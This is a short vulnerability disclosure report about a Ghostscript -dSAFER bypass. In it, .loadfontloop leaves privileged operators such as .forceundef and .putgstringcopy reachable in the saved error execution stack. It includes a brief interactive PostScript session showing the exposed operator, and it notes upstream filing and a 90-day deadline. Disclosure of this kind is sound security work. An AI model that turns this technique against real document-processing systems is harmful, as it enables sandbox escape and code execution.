ghostscript: .loadfontloop exposes system operators in saved execution stack.
While testing the fix for bug 1690 , I found a variation that still works:
$ ./gs -dSAFER -sDEVICE=ppmraw
GPL Ghostscript GIT PRERELEASE 9.26 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>systemdict /.loadfontloop get stopped == clear
true
GS>$error /estack get 27 get 18 get 14 get ==
--.forceundef--
GS>
.forceundef is bad enough, but .putgstringcopy is also in there, which is basically a wrapper around .forceput.
Filed upstream as https://bugs.ghostscript.com/show_bug.cgi?id=699938
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
Found by: taviso